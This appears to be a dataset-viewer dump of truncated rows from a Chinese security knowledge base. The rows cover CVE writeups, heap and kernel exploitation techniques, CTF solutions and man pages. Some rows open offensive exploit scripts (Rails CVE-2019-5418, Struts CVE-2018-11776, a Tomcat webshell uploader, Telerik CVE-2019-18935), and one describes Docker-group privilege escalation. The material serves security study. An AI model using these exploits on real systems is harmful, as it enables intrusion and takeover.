text
stringlengths
100
9.93M
category
stringclasses
11 values
# Adminer远程文件读取(CVE-2021-43008) Adminer是一个PHP编写的开源数据库管理工具,支持MySQL、MariaDB、PostgreSQL、SQLite、MS SQL、Oracle、Elasticsearch、MongoDB等数据库。 在其版本1.12.0到4.6.2之间存在一处因为MySQL LOAD DATA LOCAL导致的文件读取漏洞。 参考链接: - <https://github.com/p0dalirius/CVE-2021-43008-AdminerRead> - <http://sansec.io/research/adminer-4.6.2-file-disclosure-v...
sec-knowleage
# Course Crawling Category: Misc., 250 points ## Description > The zip file is encrypted using a name of one of the courses in the Technion, see if you can crack it. The password format is `<course number>:<course name in english>` > > Note: Please try to crawl smartly and do not spam any site with request (we won't t...
sec-knowleage
# 态势感知相关书籍 [1] 网络安全态势感知:提取、理解和预测,杜嘉薇等,https://weread.qq.com/web/reader/41b32180717cc14141bc00e [2] 《数据驱动安全——数据安全分析、可视化和仪表盘》,Jay Jacobos,Bob Rudis
sec-knowleage
### 内核DoS攻击方式 对内核进行 DoS 攻击比较容易,我们可以通过以下几种方式来实现。 - 触发内核中的某个漏洞让内核崩溃 - 触发内核中的死锁 - 触发大量的内核内存泄漏,即存在大量的内存被申请但是没有被释放
sec-knowleage
# Leetcode 题解 ## 前言 本文从 Leetcode 中精选大概 200 左右的题目,去除了某些繁杂但是没有多少算法思想的题目,同时保留了面试中经常被问到的经典题目。 ## 算法思想 - [双指针](Leetcode%20题解%20-%20双指针.md) - [排序](Leetcode%20题解%20-%20排序.md) - [贪心思想](Leetcode%20题解%20-%20贪心思想.md) - [二分查找](Leetcode%20题解%20-%20二分查找.md) - [分治](Leetcode%20题解%20-%20分治.md) - [搜索](Leetcode%20题解%20-%20搜索.md) - [动态规划]...
sec-knowleage
# ret2VDSO ## VDSO介绍 什么是VDSO(Virtual Dynamically-linked Shared Object)呢?听其名字,大概是虚拟动态链接共享对象,所以说它应该是虚拟的,与虚拟内存一致,在计算机中本身并不存在。具体来说,它是将内核态的调用映射到用户地址空间的库。那么它为什么会存在呢?这是因为有些系统调用经常被用户使用,这就会出现大量的用户态与内核态切换的开销。通过vdso,我们可以大量减少这样的开销,同时也可以使得我们的路径更好。这里路径更好指的是,我们不需要使用传统的int 0x80来进行系统调用,不同的处理器实现了不同的快速系统调用指令 - intel实现了sysenter,sysexit - ...
sec-knowleage
# House of Rabbit ## 介绍 House of rabbit是一种伪造堆块的技术,早在2017年已经提出,但在最近两个月才在CTF比赛中出现。我们一般运用在fastbin attack中,因为unsorted bin等其它的bin有更好的利用手段。 ## 原理 我们知道,fastbin中会把相同的size的被释放的堆块用一个单向链表管理,分配的时候会检查size是否合理,如果不合理程序就会异常退出。而house of rabbit就利用了在malloc consolidate的时候fastbin中的堆块进行合并时size没有进行检查从而伪造一个假的堆块,为进一步的利用做准备。 由于原作者的[POC](https:/...
sec-knowleage
# ElasticSearch 命令执行漏洞(CVE-2014-3120)测试环境 jre版本:openjdk:8-jre elasticsearch版本:v1.1.1 ## 原理 相关文档:http://bouk.co/blog/elasticsearch-rce/ 、 https://www.t00ls.net/viewthread.php?tid=29408 老版本ElasticSearch支持传入动态脚本(MVEL)来执行一些复杂的操作,而MVEL可执行Java代码,而且没有沙盒,所以我们可以直接执行任意代码。 MVEL执行命令的代码如下: ```java import java.io.*; new java....
sec-knowleage
# Xplico软件包描述 Xplico的目标是获取网络流量中的应用信息数据。例如,从pcap文件中,Xplico可以提取每个电子邮件(POP、IMAP和SMTP协议)、HTTP、VoIP呼叫(SIP、MGCP、H323)、FTP、TFTP等内容。 Xplico不是网络协议分析器。 [Xplico首页](http://www.xplico.org/)| [Kali Xplico资源](http://git.kali.org/gitweb/?p=packages/xplico.git;a=summary) - 作者:Gianluca Costa,Andre de Franceschi - 许可证:GPLv2 ## Xplico包含的工...
sec-knowleage
import os, base64, time, random, string from Crypto.Cipher import AES from Crypto.Hash import * key = os.urandom(16) def pad(msg): pad_length = 16-len(msg)%16 return msg+chr(pad_length)*pad_length def unpad(msg): return msg[:-ord(msg[-1])] def encrypt(iv,msg): msg = pad(msg) cipher = AES.new(key...
sec-knowleage
# T1190-vBulletin5.X-RCE检测 ## 来自ATT&CK的描述 使用软件,数据或命令来利用面向Internet的计算机系统或程序中的弱点,从而导致意外或无法预期的行为。系统的弱点可能是错误、故障或设计漏洞。这些应用程序通常是网站,但是可以包括数据库(例如SQL),标准服务(例如SMB 或SSH)以及具有Internet可访问开放的任何其他应用程序,例如Web服务器和相关服务。根据所利用的缺陷,这可能包括“利用防御防卫”。 如果应用程序托管在基于云的基础架构上,则对其进行利用可能会导致基础实际应用受到损害。这可以使攻击者获得访问云API或利用弱身份和访问管理策略的路径。 对于网站和数据库,OWASP排名前10位和C...
sec-knowleage
--- title: Docker 用户组提权 --- <center><h1>Docker 用户组提权</h1><b>本文作者:一生热爱</b><br><br></center> --- ## 一、简介 Docker 运行的所有命令都是需要 sudo 来运行,那是因为 docker 需要 root 权限才能跑。 Docker 监护进程有一个特性,它能被允许访问 root 用户或者是在 docker 组里面的所有用户,这就如同拥有 root 的访问权限。 ## 二、复现 如果一个服务器有一个普通的用户,并且这个用户加入了 docker 组,则这个用户已经是 root 了。 ### 1、方法一 #### 环境搭建 ```bash ad...
sec-knowleage
--- title: PyTorch date: 2023-04-12 background: bg-[#ee4c2c] tags: - AI - Python categories: - Other intro: This is a quick reference list of cheat sheets for PyTorch. See also [PyTorch website](https://pytorch.org/) --- ## Imports { .cols-1 } ### General ``` import torch # ...
sec-knowleage
.\" 本man页版权所有(C)1996 Austin Donnelly <and1000@cam.ac.uk>, .\" 附加资源版权(c)1995 Martin Schulze <joey@infodrom.north.de>. .\" .\" 在保留了版权通告和该使用权限通告的前提下,可以授权生成和发布 .\" 该手册的复制版本 .\" .\" 在所有最终工作是按照与本篇中一致的权限通告的条例来发布并提供 .\" 了逐字复制的前提下,可以授权复制发布该手册的修改版本. .\" .\" 因为Linux内核和库经常改变,该手册页可能会不正确或者过时.作者 .\" (们)对这些错误、遗漏或者因使用其中的信息而导致的损害不承担任 ....
sec-knowleage
## AsisHash 150 (re, 150p) ### PL [ENG](#eng-version) Dostajemy [program](./hash.elf) (elf). Analizujemy jego działanie, w dużym uproszczeniu wygląda to tak: int main() { char password[...]; scanf("%s", password); char *hash = hash_password(password); if (!strcmp(hash, good_hash)) {...
sec-knowleage
version: '2' services: mongo: image: mongo:5.0.6 environment: MONGO_INITDB_ROOT_USERNAME: root MONGO_INITDB_ROOT_PASSWORD: root MONGO_INITDB_DATABASE: yapi web: image: vulhub/yapi:1.9.2 ports: - "3000:3000" volumes: - ./config.json:/usr/config.json environment: ...
sec-knowleage
# 用户代码不可执行 起初,在内核态执行代码时,可以直接执行用户态的代码。那如果攻击者控制了内核中的执行流,就可以执行处于用户态的代码。由于用户态的代码是攻击者可控的,所以更容易实施攻击。为了防范这种攻击,研究者提出当位于内核态时,不能执行用户态的代码。在 Linux 内核中,这个防御措施的实现是与指令集架构相关的。 ## x86 - SMEP - Supervisor Mode Execution Protection x86 下对应的保护机制的名字为 SMEP。CR4 寄存器中的第 20 位用来标记是否开启 SMEP 保护。 ### 发展历史 TODO。 ### 实现 TODO。 ### 开启与关闭 #### 开启 默认情况下,...
sec-knowleage
# T1098-win-账户操作 ## 来自ATT&CK的描述 帐户操作可以帮助攻击者维持在环境中对凭据和某些权限级别的访问。账户操作可能包括修改权限,修改凭据,添加或更改权限组,修改帐户设置或修改执行身份验证等方式。为了创建或操纵帐户,攻击者必须已经对系统或域具有足够的权限。 ## 测试案例 使用windows系统自身的一些安全进程(CMD/Powershell等)来执行这些操作,也可以利用一些经典的工具来进行账户操作(mimikatz等)。前提是你已经对系统或者域具有足够的权限。 ## 检测日志 windows 安全日志 ## 测试复现 ```dos C:\Windows\system32>net user test321 Te...
sec-knowleage
require 'erb' require "./demo-5.2.1/config/environment" require "base64" require 'net/http' $proxy_addr = '127.0.0.1' $proxy_port = 8080 $remote = "http://172.18.0.3:3000" $ressource = "/demo" puts "\nRails exploit CVE-2019-5418 + CVE-2019-5420 = RCE\n\n" print "[+] Checking if vulnerable to CVE-2019-5418 => " uri ...
sec-knowleage
# 初识命令行界面 Shell 是系统的用户界面,提供了用户与内核进行交互操作的一种接口。它接收用户输入的命令并把它送入内核去执行。 ### shell 环境 Shell 是一个用 C 语言编写的程序,它是用户使用 Linux 的桥梁。Shell 既是一种命令语言,又是一种程序设计语言。 Shell 是指一种应用程序,这个应用程序提供了一个界面,用户通过这个界面访问操作系统内核的服务。 Ken Thompson 的 sh 是第一种 Unix Shell,Windows Explorer 是一个典型的图形界面 Shell。 ### 怎么进入 状态行界面 我们平时在图形界面用的都是普通用户,没有系统用户权限不能修改一些系统配置文件,那...
sec-knowleage
#!/usr/bin/env python3 # coding=utf-8 # ***************************************************** # struts-pwn: Apache Struts CVE-2018-11776 Exploit # Author: # Mazin Ahmed <Mazin AT MazinAhmed DOT net> # This code uses a payload from: # https://github.com/jas502n/St2-057 # *************************************************...
sec-knowleage
.\" Copyright (c) Bruno Haible <haible@clisp.cons.org> .\" .\" This is free documentation; you can redistribute it and/or .\" modify it under the terms of the GNU General Public License as .\" published by the Free Software Foundation; either version 2 of .\" the License, or (at your option) any later version. .\" .\" ...
sec-knowleage
'\" '\" Copyright (c) 1996 Sun Microsystems, Inc. '\" '\" See the file "license.terms" for information on usage and redistribution '\" of this file, and for a DISCLAIMER OF ALL WARRANTIES. '\" '\" RCS: @(#) $Id: messageBox.n,v 1.2 2003/11/24 05:09:59 bbbush Exp $ '\" '\" The definitions below are for supplemental mac...
sec-knowleage
# Proc 类 --- - https://www.kancloud.cn/imxieke/ruby-base/107309 --- # Proc 类是什么 所谓 `Proc`,就是使块对象化的类。`Proc` 与块的关系非常密切,下面,我们来看看如何创建与执行 `Proc` 对象。 - `Proc.new(...)` - `proc{...}` 创建 `Proc` 对象的典型方法是通过 `Proc.new` 方法,或者对 `proc` 方法指定块。 ```ruby hello1 = Proc.new do |name| puts "Hello, #{name}." end hell...
sec-knowleage
# Kioptrix: Level 1.1 下载地址: ``` https://download.vulnhub.com/kioptrix/Kioptrix_Level_2-update.rar ``` ## 实战操作 netdiscover找到靶场IP:`192.168.0.10` ``` ┌──(root💀kali)-[/tmp] └─# nmap -sV -p1-65535 192.168.0.10 255 ⨯ Starting Nmap 7.91 ( https://nmap...
sec-knowleage
# 认证 <p align="center"> <a href="http://turnoff.us/geek/the-depressed-developer-54/"><img src="../../../../assets/img/banner/认证.jpg" width="65%"></a> </p> --- ## 用户信息 **/etc/passwd** `/etc/passwd` 是用户数据库,其中的域给出了用户名、加密口令和用户的其他信息 `/etc/passwd` 文件中的每个用户都有一个对应的记录行,记录着这个用户的一下基本属性。`/etc/passwd` 只有系统管理员才可以修改的,该文件对所有用户可读。 ...
sec-knowleage
# Freshen uploader (web) ## ENG [PL](#pl-version) It was a basic 2-stage web task. We get link to a webpage which is supposed to be some uploader service, but upload is disabled. We can see 3 uploaded files and we can dowload them. Download link is for example: `fup.chal.ctf.westerns.tokyo/download.php?f=6a92b449761226...
sec-knowleage
stty === 修改终端命令行的相关设置 ## 补充说明 **stty命令** 修改终端命令行的相关设置。 ### 语法 ```shell stty(选项)(参数) ``` ### 选项 ```shell -a:以容易阅读的方式打印当前的所有配置; -g:以stty可读方式打印当前的所有配置。 ``` ### 参数 终端设置:指定终端命令行的设置选项。 ### 实例 **在命令行下,禁止输出大写的方法:** ```shell stty iuclc #开启 stty -iuclc #恢复 ``` **在命令行下禁止输出小写:** ```shell stty olcuc #开启 stty -olcu...
sec-knowleage
#!/usr/bin/python # From https://github.com/cyberheartmi9/CVE-2017-12617/blob/master/tomcat-cve-2017-12617.py """ ./cve-2017-12617.py [options] options: -u ,--url [::] check target url if it's vulnerable -p,--pwn [::] generate webshell and upload it -l,--list [::] hosts list [+]usage: ./cve-2017-12617.py -u htt...
sec-knowleage
# Troll 2 > https://download.vulnhub.com/tr0ll/Tr0ll2.rar > > https://download.vulnhub.com/tr0ll/Tr0ll2_vbox.rar 靶场IP:`192.168.32.173` ![image-20220718103332901](../../.gitbook/assets/image-20220718103332901.png) 扫描对外端口 ``` ┌──(root💀kali)-[/opt/linux-exploit-suggester] └─# nmap -p 1-65535 192.168.32.173 ...
sec-knowleage
.TH NoteBook 3tk "tcllib - BWidget" .SH NAME .B NoteBook - 笔记本管理器组件 .SH 创建 CREATION .B NoteBook pathName ?option value...? .SH 描述 DESCRIPTION NoteBook 组件管理一组页面并显示其中一个。 .SH 组件特有选项 WIDGET-SPECIFIC OPTIONS .TP -height 为页面指定想要的高度。如果这个选项等于零(缺省的),则这个窗口根本不要求任何大小。在这种情况下,用户可以调用 NoteBook::compute_size 来使 NoteBook 足够大得包含最大的页面。 ...
sec-knowleage
# 弹性布局(Flex) Flex(Flexible Box) 我们这里一般作为display的一个属性使用,用于设置或检索弹性盒模型对象的子元素如何分配空间。 ### Flex 布局的使用 任何一个容器都可以指定为 Flex 布局。 ``` .box{ display: flex; //flex作为display的一个属性使用 } ``` 行内元素也可以使用 Flex 布局。 ``` .box{ display: inline-flex; } ``` Webkit 内核的浏览器,必须加上-webkit前缀。 ``` .box{ display: -webkit-flex; /* Safari */ displa...
sec-knowleage
# Level00 #### About This level requires you to find a Set User ID program that will run as the “flag00” account. You could also find this by carefully looking in top level directories in / for suspicious looking directories. Alternatively, look at the find man page. To access this level, log in as level00 with t...
sec-knowleage
.TH FILE 1 "Copyright but distributable" .SH NAME file \- 确定文件类型 .SH 总览 .B file [ .B \-bcnsvzL ] [ .B \-f 命名文件 ] [ .B \-m 幻数文件 ] file ... .SH 描述 本手册页说明了3.27版本 .B file 命令的使用. .B File 命令试图检查每个参数以判定文件的类型. 检查共有三组,按如下顺序进行:文件系统检查,幻数检查,以及语言检查. .I 文件系统 检查成功则输出文件类型. .PP 输出的类型一般会包含以下的词中的一个: .B text (文件中仅有 .SM ASCII 字符,可以用 .SM A...
sec-knowleage
# Network Discovery ## Summary - [Nmap](#nmap) - [Network Scan with nc and ping](#network-scan-with-nc-and-ping) - [Spyse](#spyse) - [Masscan](#masscan) - [Netdiscover](#netdiscover) - [Responder](#responder) - [Bettercap](#bettercap) - [Reconnoitre](#reconnoitre) - [SSL MITM with OpenSSL](#ssl-mitm-with-openssl) - [Re...
sec-knowleage
usermod === 用于修改用户的基本信息 ## 补充说明 **usermod命令** 用于修改用户的基本信息。usermod 命令不允许你改变正在线上的使用者帐号名称。当 usermod 命令用来改变user id,必须确认这名user没在电脑上执行任何程序。你需手动更改使用者的 crontab 档。也需手动更改使用者的 at 工作档。采用 NIS server 须在server上更动相关的NIS设定。 ### 语法 ```shell usermod(选项)(参数) ``` ### 选项 ```shell -c<备注>:修改用户帐号的备注文字; -d<登入目录>:修改用户登入时的目录,只是修改/etc/passwd中用户的家目...
sec-knowleage
shuf === 产生随机的排列。 ## 概要 ```shell shuf [OPTION]... [FILE] shuf -e [OPTION]... [ARG]... shuf -i LO-HI [OPTION]... ``` ## 主要用途 - 将输入的内容随机排列并输出。 - 当没有文件或文件为`-`时,读取标准输入。 ## 选项 ```shell -e, --echo 将每个ARG视为输入行。 -i, --input-range=LO-HI 将数字范围LO(最低)到HI(最高)之间的作为输入行。 -n, --head-count=COUNT 只输出前COUNT行。 -o,...
sec-knowleage
# H1 Thermostat - FLAG0 ## 0x00 Configure Proxy Set Android Emulator use the Burp proxy. ![](./imgs/proxy.jpg) ## 0x01 Install APK Just drug apk to install it into Android Emulator. And start the app. Here comes the first FLAG in the POST request. ![](./imgs/flag.jpg)
sec-knowleage
import subprocess import string for a in string.letters: for b in string.letters: with open("/tmp/ff", "wb") as f: f.write(": You probably just want the flag. So here it is: CTF{dZXi%c%c--------PIUTYMI}. :" % (a, b)) o = subprocess.check_output([ "./crchack", "-w64", "-p", ...
sec-knowleage
.\" auto-generated by docbook2man-spec $Revision: 1.1 $ .TH "ALTER OPERATOR CLASS" "7" "2003-11-02" "SQL - Language Statements" "SQL Commands" .SH NAME ALTER OPERATOR CLASS \- 修改一个操作符表的定义 .SH SYNOPSIS .sp .nf ALTER OPERATOR CLASS \fIname\fR USING \fIindex_method\fR RENAME TO \fInewname\fR .sp .fi .SH "DESCRIPTION 描述" ....
sec-knowleage
# Librsvg XInclude Arbitrary file reading (CVE-2023-38633) [中文版本(Chinese Version)](README.zh-cn.md) Librsvg is a free software SVG rendering library written as part of the GNOME project, intended to be lightweight and portable. A directory traversal problem in the URL decoder of librsvg before 2.56.3 could be used b...
sec-knowleage
#!/usr/bin/env python3 # origin : https://github.com/noperator/CVE-2019-18935 # INSTALL: # git clone https://github.com/noperator/CVE-2019-18935.git && cd CVE-2019-18935 # python3 -m venv env # source env/bin/activate # pip3 install -r requirements.txt # Import encryption routines. from sys import path path.insert...
sec-knowleage
# 如何进行情报搜集? ### 如何收集? - 开源情报收集 - 针对IOC,从常见的指标进行分析: - 网络。IP,URL - 主机。文件哈希,动态链接库,注册表 - 邮件 - 使用开源的威胁情报平台 - 自己搭建蜜罐、蜜网,收集攻击数据(IP,Hash,URL等) - 对自己的已有资产进行分析建模 ## 开源情报来源 确定开源情报来源时,我们首先约定,开源情报可以简单分为:战略情报、战役情报和战术情报。 ### 渠道角度 这是从渠道角度进行的分类: ![](https://image-host-toky.oss-cn-shanghai.aliyuncs.com/20200624054040.png) Fig. 开源情...
sec-knowleage
# CRLF Injection ## Introduction A CRLF Injection attack occurs when a user manages to submit a CRLF into an application. This is most commonly done by modifying an HTTP parameter or URL. ## Where to find It can be found anywhere, always check the request and response. Try to search for parameters that lead to redirect...
sec-knowleage
# 应用层拒绝服务攻击 CC(Chanllenge Collapsar):CC就是DDoS的一种。 通过控制某些主机补丁发送大量数据包给服务器造成服务器资源耗尽,一直到宕机崩溃,常用于攻击页面。 ## 应用层拒绝服务攻击分类 ### Get-Flood 直接对较为消耗资源的URL进行大量的请求,也可以通过多个URL并发,单一URL并发请求,随机URL请求等。 ### SlowLoris 也称为slow headers,攻击者始终构造不完整的http header发送,同时还间隔一定时间再发送数据,导致服务器一直处于等待状态。 ### SlowPost 也称为slow body,攻击的重点在POST数据上,通过将HTTP Header...
sec-knowleage
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>Error</title> </head> <body> <p>login error</p> </body> </html>
sec-knowleage
**Authors**: < [nixawk](https://github.com/nixawk) >, < [sjas](https://github.com/sjas) > ---- # Reporting *Reporting* is by far the most important element of a penetration test. You will use reports to communicate what you did, how you did it, and, most important, how the organization should fix the vulnerabilities di...
sec-knowleage
# T1070-005-win-删除网络共享连接 ## 来自ATT&CK的描述 攻击者可能会删除不再使用的共享连接,以清除其运行痕迹。不再需要Windows共享驱动器和SMB Windows Admin Shares连接时,可以将其删除。Net是一个实用程序,可用于通过net use \system\share /delete命令删除网络共享连接。 ## 测试案例 net share删除网络共享 ```yml net share c$ /d ``` ## 检测日志 windows 安全日志或sysmon日志 ## 测试复现 ```yml 测试环境:windows server 2016 C:\Users\Administrator>...
sec-knowleage
# Decrypted Crypto ## Description: > Did you know server-side Wee will supports a variety of crypto operations in the future? How else could Wee ever catch up to other short-named languages like Go or all the Cs? Anyway it's still in testing. If you already want to take it for a spin, try /wee/encryptiontest. ## Solu...
sec-knowleage
## IPv6 协议相关的资料 1)IPv6 数据包构造与安全测试框架 - Chiron https://t.co/vdZo7MgqLo Paper: https://t.co/OichK9UTmv 2)为什么保障 IPv6 安全性那么困难: https://www.troopers.de/media/filer_public/42/1a/421a0a30-0a35-486a-b25e-7eea27f18ef7/troopers14-why_ipv6_security_is_so_hard-structural_deficits_of_ipv6_and_their_implications-enno_rey...
sec-knowleage
# buffer overflow 1 Binary Exploitation, 200 points ## Description: > Okay now you're cooking! This time can you overflow the buffer and return to the flag function in this program? ```c #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/types.h> #include "asm.h" #define BUFSIZ...
sec-knowleage
## Simple (crypro, 100p, 86 solves) > Become admin! > http://52.69.244.164:51913 > [simple-01018f60e497b8180d6c92237e2b3a67.rb](simple.rb) ### PL [ENG](#eng-version) Możemy wykonać HTTP `GET` oraz `POST` do podanej usługi. `POST` szyfruje JSONa złożonego z podanego loginu oraz hasła 128-bitowym AESem w trybie CFB. `...
sec-knowleage
rename === 用字符串替换的方式批量改变文件名 ## 补充说明 rename命令存在两个版本用法上有所区别 ```bash C语言版本, 支持通配符 [常用通配符说明] ? 表示一个任意字符 * 表示一个或一串任意字符 Perl版本, 支持正则表达式 [常用正则表达式符号说明] ^ 匹配输入的开始位置 $ 匹配输入的结尾 . 匹配除换行符外的任意字符 + 匹配前一个字符一次或多次 例如,"zo+"可以匹配"zoo",但不匹配"z" [a-z] 表示某个范围内的字符,例如,"[a-z]"匹配"a"与"z"之间的任何一个小写字母字符。 [^m-z] 否定的字符区间。与不在指定区间...
sec-knowleage
# cisco-auditing-tool描述 思科路由扫描工具,检测常见漏洞,使用Perl语言编写 [cisco-auditing-tool主页](http://www.scrypt.net/) | [Kali cisco-auditing-tool仓库](http://git.kali.org/gitweb/?p=packages/cisco-auditing-tool.git;a=summary) Author: g0ne License: GPLv2 包含在这个包里的工具 CAT – 扫描思科路由器中的常用漏洞 >root@kali:~# CAT > >Cisco Auditing Tool - g0ne [null0] >...
sec-knowleage
# Writeup Sharif CTF 7 2016 Team: nazywam, c7f.m0d3, akrasuski1, msm, psrok1, seikendev, shalom ### Table of contents * [Strange PDF (forensics 150)](for_150_strange_pdf) * [Poor guy (web 150)](web_150_poor_guy) * [Irish Home (web 200)](web_200_irish_home) * [Jare Captcha (web 200)](web_200_jareCaptcha) * [Lost Voice (...
sec-knowleage
true === 返回状态为成功。 ## 概要 ```shell true ``` ## 主要用途 - 用于和其他命令进行逻辑运算。 ## 返回值 返回状态总是成功;返回值为0。 ## 例子 ```shell # 当你的脚本设置set -e时,任何返回值为失败的命令都会使得脚本退出。 set -e # 如何临时跳过呢?下面的语句使用逻辑或操作符连接true,返回值一定为真。 some_command || true # 当然,和python的pass一样,也可以用作条件语句临时占位。 ``` ### 注意 1. 该命令是bash内建命令,相关的帮助信息请查看`help`命令。
sec-knowleage
# H1 Thermostat - FLAG1 ## 0x00 Params There are different messages sending through. We can decode them with [base64][1]. | encoded | readable | | ------------------------------------------------ | ------------------------------------ | | eyJjbWQiOiJn...
sec-knowleage
# Episode 2: Challenge 1 ## Description > This image might look familiar. But where have you seen it before? > > Hint: Sometimes the answers are hidden in plain site A PNG image was attached. ## Solution Let's check the image for hidden information with `zsteg`: ```console ┌──(user@kali)-[/media/…/h4ck1ng.google/EP00...
sec-knowleage
version: '2' services: solr: command: solr-demo image: vulhub/solr:8.8.1 ports: - "8983:8983"
sec-knowleage
## 签到 一个 flash 小游戏 不过跑起来还是挺麻烦的,装了个 360浏览器开兼容模式,再装个 PPAPI 的 flash 才运行起来 打过关后就有 flag 了 A8E5A632E549ECD98E902055B02B10A2 --- ## ereg php代码审计: strpos数组绕过,两种解法: - 科学计数法 - []数组绕过 代码当时没存:找了个类似题目 ```php <?php $flag = "flag"; if (isset ($_GET['password'])) { if (@ereg ("^[1-9]+$", $_GET['password']) === FALSE) echo '必须输入数字才行'; ...
sec-knowleage
# XStream Deserialization Remote Command Execution (CVE-2021-29505) [中文版本(Chinese version)](README.zh-cn.md) XStream is a simple library to serialize objects to XML and back again. XStream uses a blocklist mechanism when parsing XML text which is utilized to defend against deserialization vulnerabilities, but in 1.4...
sec-knowleage
**Railgun是Meterpreter stdapi的扩展,允许任意加载DLL。Railgun的最大好处是能够动态访问系统上的整个Windows API。通过从用户进程调用Windows API。** ![](media/3887a1136b060d02cc820deceb0610c5.jpg) meterpreter下执行irb进入ruby交互。 基本的信息搜集: ```bash >> client.sys.config.sysinfo['OS'] => "Windows .NET Server (Build 3790, Service Pack 2)." >> client.sys.config.getuid => "W...
sec-knowleage
# vault-door-7 Reverse Engineering, 400 points ## Description: > This vault uses bit shifts to convert a password string into an array of integers. Hurry, agent, we are running out of time to stop Dr. Evil's nefarious plans! ```java import java.util.*; import javax.crypto.Cipher; import javax.crypto.spec.SecretKeySpec;...
sec-knowleage
--- title: 0.5.0 版本更新描述 --- <center><h1>CF 云环境利用框架现已更新至 0.5.0 版本</h1></center> CF 是一个云环境利用框架,主要拿来进行云访问凭证的后利用,助力云上攻防。 CF 于 2022 年 7 月 1 日发布,今天正好是该工具发布的一周年,现在 CF 已有近 2k Stars,今天 CF 更新到了 0.5.0 版本,这里介绍下这个版本所更新的内容。 CF 项目地址:[github.com/teamssix/cf](https://github.com/teamssix/cf) CF 使用手册:[wiki.teamssix.com/cf](https://wiki....
sec-knowleage
# Easy1 Cryptography, 100 points ## Description: > The one time pad can be cryptographically secure, but not when you know the key. Can you solve this? We've given you the encrypted flag, key, and a table to help UFJKXQZQUNB with the key of SOLVECRYPTO. Can you use this table to solve it? ``` A B C D E F G H I J K ...
sec-knowleage
.\"Generated by db2man.xsl. Don't modify this, modify the source. .de Sh \" Subsection .br .if t .Sp .ne 5 .PP \fB\\$1\fR .PP .. .de Sp \" Vertical space (when we can't use .PP) .if t .sp .5v .if n .sp .. .de Ip \" List item .br .ie \\n(.$>=3 .ne \\$3 .el .ne 3 .IP "\\$1" \\$2 .. .TH "SMBPASSWD" 8 "" "" "" .SH NAME smb...
sec-knowleage
### The Heap概述 堆在初始化时, 会检查`heap flags`, 并视一些标志位的有无设置而对环境作出额外的改变. 像`Themida`就有采用这种方法来检测调试器. 比如: * 如果设置了`HEAP_TAIL_CHECKING_ENABLED`标志(见`Heap Flags`节), 那么在32位windows中就会在分配的堆块尾部附加2个`0xABABABAB`(64位环境就是4个). * 如果设置了`HEAP_FREE_CHECKING_ENABLED`(见`Heap Flags`节)标志, 那么当需要额外的字节来填充堆块尾部时, 就会使用`0xFEEEFEEE`(或一部分)来填充 那么, 一种新的检测调试器的方法...
sec-knowleage
#!/usr/bin/python2 from pwn import * import cipher def exploit(connection): ciphertext = 0x8F1FA1AD36C66F95, 0xC96AAC2F35C3833F key = 0x70697A7A6174716C, 0x6C7174617A7A6970 plaintext = cipher.decrypt(key, ciphertext) payload = """ /* * std::string key("YouMadeAFIDLCall"); ...
sec-knowleage
# T1090-001-win-链接代理 ## 来自ATT&CK的描述 攻击者可以使用连接代理在系统之间定向网络流量,或者充当与命令和控制服务器进行网络通信的中介,以避免直接连接至其基础结构。存在许多启用代理或端口重定向的流量重定向的工具,包括HTRAN,ZXProxy和ZXPortMap。攻击者使用这些类型的代理来管理命令和控制通信,减少同时出站网络连接的数量,面对连接丢失时提供弹性或在受害者之间越过现有的受信任通信路径以避免怀疑。 外部连接代理用于掩盖C2流量的目的地,通常使用端口重定向器实现。受害环境之外的受损系统以及已购买的基础结构(如基于云的资源或虚拟专用服务器)都可以用于这些目的。可以基于对从受感染系统到代理的连接进行调...
sec-knowleage
# State agency (Web) We get access to a webpage for reporting security vulnerabilities. It seems basically nothing there works, apart from reading two existing reports. Once we click on them we get a link with same GET parameters (which are ignored), but the interesting part is that the link is for example `http://5889...
sec-knowleage
# Fix Me if You Can Category: Misc., 50 Points ## Description > Fix me if you can and you will be half way to find the flag. > > Good Luck! A `*.doc` was attached. ## Solution The attached file has a `*.doc` extension, but `file` doesn't recognize it as a Word document: ```console root@kali:/media/sf_CTFs/checkpoint/F...
sec-knowleage
# T1070-001-win-使用wevtutil命令删除日志 ## 来自ATT&CK的描述 攻击者可能试图阻止由监测软件或进程捕获到的告警,以及事件日志被收集和分析。这可能包括修改配置文件或注册表项中的监测软件的设置,以达到逃避追踪的目的。 在基于特征监测的情况下,攻击者可以阻止监测特征相关的数据被发送出去,以便于阻止安全人员进行分析。这可以有很多方式实现,例如停止负责转发的进程(splunk转发器、Filebate、rsyslog等)。 在正常的操作期间内,事件日志不太可能会被刻意清除。但是恶意攻击者可能会通过清除事件日志来尝试掩盖自己的踪迹。当事件日志被清除时,它是可疑的。发现“清除事件日志”时可能意味着有恶意攻击者利用了此...
sec-knowleage
.\" -*- nroff -*- .\" manual page [] for chat 1.8 .\" SH section heading .\" SS subsection heading .\" LP paragraph .\" IP indented paragraph .\" TP hanging label .TH CHAT 8 "22 May 1999" "Chat Version 1.22" .SH NAME chat \- 與數據機自動溝通的指令稿 .SH "总览 SYNOPSIS" .B chat [ .I options ] .I script .SH "描述 DESCRIPTION" .LP \fIcha...
sec-knowleage
--- title: Sequel Pro date: 2022-11-23 16:23:31.701510 background: bg-[#ca9c3d] label: Mac tags: - - mac categories: - Keyboard Shortcuts intro: | A visual cheat-sheet for the 71 keyboard shortcuts found in Sequel Pro. This application is MacOS-only. --- Keyboard Shortcuts ------------------ ### Main ...
sec-knowleage
--- title: 查看自己所拥有的权限 --- <center><h1>在 AWS 下查看自己所拥有的权限</h1></center> --- ## 我是谁? 当我们拿到 AWS 访问凭证后,往往会面临一个问题,我是谁? 通过下面这条命令就能看到自己当前是那个用户了,如果返回的是 root 用户,那么恭喜你,你拥有所有的权限。 ```shell aws iam get-user ``` ```shell > aws iam get-user { "User": { "UserId": "0123456789", "Arn": "arn:aws:iam::0123456789:root", ...
sec-knowleage
ftptop === proftpd服务器的连接状态 ## 补充说明 **ftptop命令** 类似于top命令的显示风格显示proftpd服务器的连接状态。 ### 语法 ```shell ftptop(选项) ``` ### 选项 ```shell -D:过滤正在下载的会话; -S:仅显示指定虚拟主机的连接状态; -d:指定屏幕刷新时间,默认 ```
sec-knowleage
